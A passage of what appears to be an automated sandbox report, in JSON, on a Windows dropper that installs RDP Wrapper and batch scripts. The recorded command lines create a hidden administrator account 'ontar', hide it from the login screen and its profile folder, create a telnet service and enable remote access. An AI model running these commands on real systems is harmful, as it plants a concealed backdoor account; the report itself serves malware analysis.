"Reg.exe add \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\Machine\\GPO-List\\0\" \/v \"Version\" \/t REG_DWORD \/d \"196611\" \/f",
"net localgroup Administrators ontar \/add",
"sc create tlntsvr binPath= tlntsvr.exe",
"reg add \"HKLM\\software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\" \/v ontar \/t REG_DWORD \/d 0x0 \/f",
"sc config rasman start= auto",
"attrib C:\\users\\ontar +r +a +s +h",
"Reg.exe add \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\Machine\\Extension-List\\{00000000-0000-0000-0000-000000000000}\" \/v \"EndTimeLo\" \/t REG_DWORD \/d \"2387249407\" \/f"
],
"file_read": [
"C:\\Users\\cuck\\AppData\\Local\\Temp\\U.bat"
],
"regkey_read": [
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Command Processor\\AutoRun",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor\\DisableUNCCheck",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\safer\\codeidentifiers\\LogFileName",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor\\DelayedExpansion",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Command Processor\\CompletionChar",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Command Processor\\DefaultColor",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\en-US",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Command Processor\\DelayedExpansion",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor\\EnableExtensions",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\safer\\codeidentifiers\\DefaultLevel",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\GRE_Initialize\\DisableMetaFiles",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor\\PathCompletionChar",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\Windows Error Reporting\\WMR\\Disable",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor\\CompletionChar",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Command Processor\\EnableExtensions",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\safer\\codeidentifiers\\SaferFlags",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\en-US",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\safer\\codeidentifiers\\PolicyScope",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Srp\\GP\\RuleCount",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Language Groups\\1",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Locale\\00000409",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Command Processor\\PathCompletionChar",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\safer\\codeidentifiers\\Levels",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Command Processor\\DisableUNCCheck",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor\\DefaultColor",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor\\AutoRun"
],
"directory_enumerated": [
"C:\\Python27\\attrib",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\sc",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\Reg.exe",
"C:\\Python27\\Scripts\\attrib",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\net",
"C:\\Users\\cuck\\AppData",
"C:\\Windows\\System32\\netsh.*",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\Reg.exe.*",
"C:\\Users\\cuck\\AppData\\Local\\Temp",
"C:\\Windows\\System32\\attrib.*",
"C:\\Python27\\reg.*",
"C:\\Python27\\Scripts\\reg.*",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\sc.*",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\U.bat",
"C:\\Windows\\System32\\attrib.COM",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\Reg.*",
"C:\\Users\\ontar",
"C:\\Windows\\System32\\net.*",
"C:\\Python27\\sc",
"C:\\Windows\\System32\\reg.*",
"C:\\Python27\\Scripts\\Reg.exe.*",
"C:\\Python27\\Scripts\\sc",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\reg",
"C:\\Python27\\Scripts\\Reg",
"C:\\Python27\\Scripts\\sc.*",
"C:\\Users",
"C:\\Python27\\sc.*",
"C:\\Python27\\Reg.*",
"C:\\Windows\\System32\\netsh.exe",
"C:\\Python27\\Scripts\\net",
"C:\\Python27\\Scripts\\net.*",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\reg.*",
"C:\\Python27\\net",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\netsh.*",
"C:\\Windows\\System32\\netsh.COM",
"C:\\Windows\\System32\\Reg.*",
"C:\\Windows\\System32\\reg.COM",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\attrib",
"C:\\Python27\\Scripts\\netsh.*",
"C:\\Python27\\Scripts\\Reg.exe",
"C:\\Python27\\netsh.*",
"C:\\Users\\cuck",
"C:\\Python27\\Scripts\\reg",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\net.*",
"C:\\Windows\\System32\\sc.*",
"C:\\Windows\\System32\\net.COM",
"C:\\Users\\cuck\\AppData\\Local",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\attrib.*",
"C:\\Windows\\System32\\sc.exe",
"C:\\Python27\\netsh",
"C:\\Python27\\Reg",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\Reg",
"C:\\Windows\\System32\\attrib.exe",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\netsh",
"C:\\Python27\\Scripts\\attrib.*",
"C:\\Python27\\Scripts\\netsh",
"C:\\Python27\\reg",
"C:\\Python27\\net.*",
"C:\\Windows\\System32\\net.exe",
"C:\\Python27\\Scripts\\Reg.*",
"C:\\Python27\\attrib.*",
"C:\\Python27\\Reg.exe",
"C:\\Python27\\Reg.exe.*",
"C:\\Windows\\System32\\sc.COM",
"C:\\Windows\\System32\\reg.exe"
]
},
"first_seen": 1574704386.046875,
"ppid": 2740
},
{
"process_path": "C:\\Windows\\SysWOW64\\cmd.exe",
"process_name": "cmd.exe",
"pid": 2736,
"summary": {
"dll_loaded": [
"kernel32.dll"
],
"file_opened": [
"",
"\\Device\\NamedPipe\\",
"C:\\Windows\\Globalization\\Sorting\\sortdefault.nls"
],
"regkey_opened": [
"HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\System",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor",
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Command Processor"
],
"file_exists": [
"C:\\Users\\cuck\\AppData\\Local\\Temp"
],
"command_line": [
"Find \"=\"",
"WMIC Group Where \"SID = 'S-1-5-32-555'\" Get Name \/Value "
],
"regkey_read": [
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Command Processor\\DefaultColor",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Command Processor\\AutoRun",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Command Processor\\DelayedExpansion",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor\\DisableUNCCheck",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Command Processor\\EnableExtensions",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor\\CompletionChar",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor\\EnableExtensions",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\en-US",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Command Processor\\PathCompletionChar",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Locale\\00000409",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Language Groups\\1",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\en-US",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\GRE_Initialize\\DisableMetaFiles",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor\\PathCompletionChar",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Command Processor\\DisableUNCCheck",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor\\DelayedExpansion",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor\\AutoRun",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor\\DefaultColor",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Command Processor\\CompletionChar"
],
"directory_enumerated": [
"C:\\Users\\cuck\\AppData\\Local\\Temp\\WMIC.*",
"C:\\Users\\cuck\\AppData",
"C:\\Windows\\System32\\wbem\\WMIC.COM",
"C:\\Users\\cuck\\AppData\\Local\\Temp",
"C:\\Windows\\System32\\WMIC",
"C:\\Windows\\System32\\WMIC.*",
"C:\\Windows\\System32\\wbem\\WMIC.exe",
"C:\\Python27\\Scripts\\Find",
"C:\\Python27\\Find.*",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\Find",
"C:\\Python27\\Scripts\\WMIC.*",
"C:\\Users\\cuck\\AppData\\Local",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\Find.*",
"C:\\Windows\\System32\\find.exe",
"C:\\Users",
"C:\\Windows\\System32\\Find.*",
"C:\\Python27\\Scripts\\Find.*",
"C:\\Windows\\System32\\find.COM",
"C:\\Windows\\WMIC.*",
"C:\\Python27\\Find",
"C:\\Users\\cuck",
"C:\\Windows\\System32\\wbem\\WMIC.*",
"C:\\Windows\\WMIC",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\WMIC",
"C:\\Python27\\WMIC.*",
"C:\\Python27\\WMIC",
"C:\\Python27\\Scripts\\WMIC"
]
},
"first_seen": 1574704387.827999,
"ppid": 2588
},
{
"process_path": "C:\\Users\\cuck\\AppData\\Local\\Temp\\903e0a66880cf6fbf4c39dff9735439084332daebaa2bdfede3b43fcbd60e46a.bin",
"process_name": "903e0a66880cf6fbf4c39dff9735439084332daebaa2bdfede3b43fcbd60e46a.bin",
"pid": 2740,
"summary": {
"file_created": [
"C:\\Users\\cuck\\AppData\\Local\\Temp\\__tmp_rar_sfx_access_check_34896828",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\RDPWInst.exe",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\SH.bat",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\Pt7.bat",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\prop.exe",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\U.bat",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\rdpwrap.ini"
],
"directory_created": [
"C:\\Users\\cuck\\AppData\\Local",
"C:\\Users\\cuck",
"C:\\Users",
"C:\\Users\\cuck\\AppData",
"C:\\Users\\cuck\\AppData\\Local\\Temp"
],
"dll_loaded": [
"COMDLG32.dll",
"kernel32.dll",
"UxTheme.dll",
"C:\\Windows\\system32\\ole32.dll",
"dwmapi.dll",
"C:\\Windows\\syswow64\\MSCTF.dll",
"KERNEL32.DLL",
"API-MS-Win-Core-LocalRegistry-L1-1-0.dll",
"comctl32",
"ole32.dll",
"COMCTL32.dll",
"USER32.dll",
"IMM32.dll",
"riched32.dll",
"riched20.dll",
"OLEAUT32.dll",
"SHELL32.dll",
"comctl32.dll",
"C:\\Windows\\system32\\shell32.dll",
"GDI32.dll",
"ADVAPI32.dll",
"SETUPAPI.dll",
"COMCTL32.DLL"
],
"file_opened": [
"C:\\Windows\\win.ini",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\903e0a66880cf6fbf4c39dff9735439084332daebaa2bdfede3b43fcbd60e46a.bin",
"C:\\Windows\\Globalization\\Sorting\\sortdefault.nls"
],
"regkey_opened": [
"HKEY_CURRENT_USER\\Software",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\CTF\\TIP\\{8613E14C-D0C0-4161-AC0F-1DD2563286BC}\\Category\\Category\\{534C48C1-0607-4098-A521-4FC899C73E90}",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\CTF\\Compatibility\\903e0a66880cf6fbf4c39dff9735439084332daebaa2bdfede3b43fcbd60e46a.bin",
"HKEY_LOCAL_MACHINE\\Software\\Policies",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\CTF\\",
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Setup",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\CTF\\TIP\\{0000897b-83df-4b96-be07-0fb58b01c4a4}\\Category\\Category\\{534C48C1-0607-4098-A521-4FC899C73E90}",
"HKEY_CURRENT_USER\\Control Panel\\Desktop",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\CTF\\TIP\\",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\AutoComplete",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Explorer\\AutoComplete",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\CTF\\TIP\\{F25E9F57-2FC8-4EB3-A41A-CCE5F08541E6}\\Category\\Category\\{534C48C1-0607-4098-A521-4FC899C73E90}",
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\CTF\\TIP\\{07EB03D6-B001-41DF-9192-BF9B841EE71F}\\Category\\Category\\{534C48C1-0607-4098-A521-4FC899C73E90}",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\CTF\\KnownClasses",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\MountPoints2\\CPC\\Volume\\{3f5cc1b6-70f9-11e8-b07b-806e6f6e6963}\\",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\CTF\\TIP\\{AE6BE008-07FB-400D-8BEB-337A64F7051F}\\Category\\Category\\{534C48C1-0607-4098-A521-4FC899C73E90}",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced",
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\CTF\\TIP\\{0000897b-83df-4b96-be07-0fb58b01c4a4}\\LanguageProfile\\0x00000000\\{0001bea3-ed56-483d-a2e2-aeae25577436}",
"HKEY_LOCAL_MACHINE\\Software",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\CTF\\TIP\\{C1EE01F2-B3B6-4A6A-9DDD-E988C088EC82}\\Category\\Category\\{534C48C1-0607-4098-A521-4FC899C73E90}",
"HKEY_CURRENT_USER\\Software\\Microsoft\\CTF\\DirectSwitchHotkeys",
"HKEY_CLASSES_ROOT\\CLSID\\{00BB2763-6A77-11D0-A535-00C04FD7D062}\\InProcServer32",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\CTF\\TIP\\{E429B25A-E5D3-4D1F-9BE3-0C608477E3A1}\\Category\\Category\\{534C48C1-0607-4098-A521-4FC899C73E90}",
"HKEY_CURRENT_USER\\Software\\Policies",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\CTF\\TIP\\{F89E9E58-BD2F-4008-9AC2-0F816C09F4EE}\\Category\\Category\\{534C48C1-0607-4098-A521-4FC899C73E90}",
"HKEY_CLASSES_ROOT\\CLSID\\{03C036F1-A186-11D0-824A-00AA005B4383}\\InProcServer32",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\CTF\\TIP\\{DCBD6FA8-032F-11D3-B5B1-00C04FC324A1}\\Category\\Category\\{534C48C1-0607-4098-A521-4FC899C73E90}",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\MountPoints2\\CPC\\Volume",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\MountPoints2\\CPC\\Volume\\{3f5cc1b5-70f9-11e8-b07b-806e6f6e6963}\\",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\CTF\\TIP\\{3697C5FA-60DD-4B56-92D4-74A569205C16}\\Category\\Category\\{534C48C1-0607-4098-A521-4FC899C73E90}",
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\AutoComplete\\Client\\",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\CTF\\TIP\\{531FDEBF-9B4C-4A43-A2AA-960E8FCDC732}\\Category\\Category\\{534C48C1-0607-4098-A521-4FC899C73E90}",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\CTF\\TIP\\{A028AE76-01B1-46C2-99C4-ACD9858AE02F}\\Category\\Category\\{534C48C1-0607-4098-A521-4FC899C73E90}",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\CTF\\TIP\\{78CB5B0E-26ED-4FCC-854C-77E8F3D1AA80}\\Category\\Category\\{534C48C1-0607-4098-A521-4FC899C73E90}",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\AutoComplete",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\CTF\\TIP\\{81D4E9C9-1D3B-41BC-9E6C-4B40BF79E35E}\\Category\\Category\\{534C48C1-0607-4098-A521-4FC899C73E90}",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\CTF\\TIP\\{03B5835F-F03C-411B-9CE2-AA23E1171E36}\\Category\\Category\\{534C48C1-0607-4098-A521-4FC899C73E90}",
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\FontSubstitutes",
"HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Explorer\\AutoComplete",
"HKEY_CURRENT_USER\\Keyboard Layout\\Toggle",
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\AutoComplete"
],
"command_line": [
"\"C:\\Users\\cuck\\AppData\\Local\\Temp\\SH.bat\" ",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\SH.bat",
"\"C:\\Users\\cuck\\AppData\\Local\\Temp\\U.bat\" ",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\Pt7.bat",
"\"C:\\Users\\cuck\\AppData\\Local\\Temp\\Pt7.bat\" ",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\U.bat"
],
"file_written": [
"C:\\Users\\cuck\\AppData\\Local\\Temp\\RDPWInst.exe",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\SH.bat",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\Pt7.bat",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\prop.exe",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\U.bat",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\rdpwrap.ini"
],
"file_deleted": [
"C:\\Users\\cuck\\AppData\\Local\\Temp\\__tmp_rar_sfx_access_check_34896828"
],
"file_exists": [
"C:\\Users\\cuck\\AppData\\Local\\Temp\\RDPWInst.exe",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\SH.bat",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\Pt7.bat",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\prop.exe",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\U.bat",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\rdpwrap.ini"
],
"guid": [
"{eac04bc0-3791-11d2-bb95-0060977b464c}",
"{5e078e03-8265-4bbe-9487-d242edbef910}",
"{00bb2763-6a77-11d0-a535-00c04fd7d062}",
"{00000000-0000-0000-c000-000000000046}",
"{807c1e6c-1d00-453f-b920-b61bb7cdd997}",
"{03c036f1-a186-11d0-824a-00aa005b4383}",
"{00bb2765-6a77-11d0-a535-00c04fd7d062}"
],
"file_read": [
"C:\\Windows\\win.ini",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\903e0a66880cf6fbf4c39dff9735439084332daebaa2bdfede3b43fcbd60e46a.bin"
],
"regkey_read": [
"HKEY_CURRENT_USER\\Keyboard Layout\\Toggle\\Language Hotkey",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\DevicePath",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\explorer\\AutoComplete\\Always Use Tab",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\ListviewAlphaSelect",
"HKEY_CURRENT_USER\\Keyboard Layout\\Toggle\\Hotkey",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\CTF\\TIP\\{0000897b-83df-4b96-be07-0fb58b01c4a4}\\LanguageProfile\\0x00000000\\{0001bea3-ed56-483d-a2e2-aeae25577436}\\Enable",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\MountPoints2\\CPC\\Volume\\{3f5cc1b5-70f9-11e8-b07b-806e6f6e6963}\\Data",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Wow6432Node\\CLSID\\{00BB2763-6A77-11D0-A535-00C04FD7D062}\\InProcServer32\\(Default)",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\en-US",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Locale\\00000409",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontSubstitutes\\Segoe UI",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\ScrollInset",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\ScrollInterval",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\ScrollDelay",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\GRE_Initialize\\DisableMetaFiles",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\MountPoints2\\CPC\\Volume\\{3f5cc1b6-70f9-11e8-b07b-806e6f6e6963}\\Data",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Setup\\SourcePath",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\CTF\\EnableAnchorContext",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\MountPoints2\\CPC\\Volume\\{3f5cc1b5-70f9-11e8-b07b-806e6f6e6963}\\Generation",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\MountPoints2\\CPC\\Volume\\{3f5cc1b6-70f9-11e8-b07b-806e6f6e6963}\\Generation",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Wow6432Node\\CLSID\\{03C036F1-A186-11D0-824A-00AA005B4383}\\InProcServer32\\(Default)",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Language Groups\\1",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\DragMinDist",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\explorer\\AutoComplete\\AutoSuggest",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\en-US",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\TurnOffSPIAnimations",
"HKEY_CURRENT_USER\\Control Panel\\Desktop\\SmoothScroll",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\ListviewShadow",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\AccListViewV6",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\explorer\\AutoComplete\\Client\\(Default)",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\UseDoubleClickTimer",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\EnableBalloonTips",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\DragDelay",
"HKEY_CURRENT_USER\\Keyboard Layout\\Toggle\\Layout Hotkey"
],
"directory_enumerated": [
"C:\\Users\\cuck\\AppData\\Local\\Temp\\903e0a66880cf6fbf4c39dff9735439084332daebaa2bdfede3b43fcbd60e46a.bin"
]
},
"first_seen": 1574704385.625,
"ppid": 1664
},
{
"process_path": "C:\\Windows\\SysWOW64\\attrib.exe",
"process_name": "attrib.exe",
"pid": 2420,
"summary": {
"file_opened": [
"C:\\Windows\\System32\\en-US\\ulib.dll.mui"
],
"regkey_read": [
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\Windows Error Reporting\\WMR\\Disable",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\GRE_Initialize\\DisableMetaFiles"
],
"directory_enumerated": [
"C:\\Windows\\System32\\dllcache",
"C:\\Windows\\System32"
]
},
"first_seen": 1574704387.374876,
"ppid": 2988
},
{
"process_path": "C:\\Windows\\SysWOW64\\net1.exe",
"process_name": "net1.exe",
"pid": 3776,
"summary": {
"dll_loaded": [
"rpcrt4.dll",
"NETMSG",
"RPCRT4.dll"
],
"file_opened": [
"\\\\?\\PIPE\\lsarpc",
"\\\\?\\PIPE\\samr"
],
"regkey_opened": [
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Rpc",
"HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows NT\\Rpc"
],
"file_written": [
"\\\\?\\PIPE\\lsarpc",
"\\\\?\\PIPE\\samr"
],
"file_read": [
"\\\\?\\PIPE\\lsarpc",
"\\\\?\\PIPE\\samr"
],
"regkey_read": [
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Language\\InstallLanguageFallback",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\en-US",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Locale\\00000409",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Rpc\\MaxRpcSize",
"HKEY_LOCAL_MACHINE\\SYSTEM\\Setup\\SystemSetupInProgress",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Language Groups\\1",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SQMClient\\Windows\\CEIPEnable",
"HKEY_CURRENT_USER\\Control Panel\\Desktop\\PreferredUILanguages",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\UILanguages\\en-US\\Type",
"HKEY_LOCAL_MACHINE\\SYSTEM\\Setup\\OOBEInProgress",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\Windows Error Reporting\\WMR\\Disable",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\UILanguages\\en-US\\AlternateCodePage",
"HKEY_CURRENT_USER\\Control Panel\\Desktop\\MuiCached\\MachinePreferredUILanguages",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\EMPTY",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\ComputerName\\ActiveComputerName\\ComputerName",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\en-US"
]
},
"first_seen": 1574704390.249876,
"ppid": 3632
},
{
"process_path": "C:\\Windows\\SysWOW64\\cmd.exe",
"process_name": "cmd.exe",
"pid": 2244,
"summary": {
"dll_loaded": [
"kernel32.dll"
],
"file_opened": [
"",
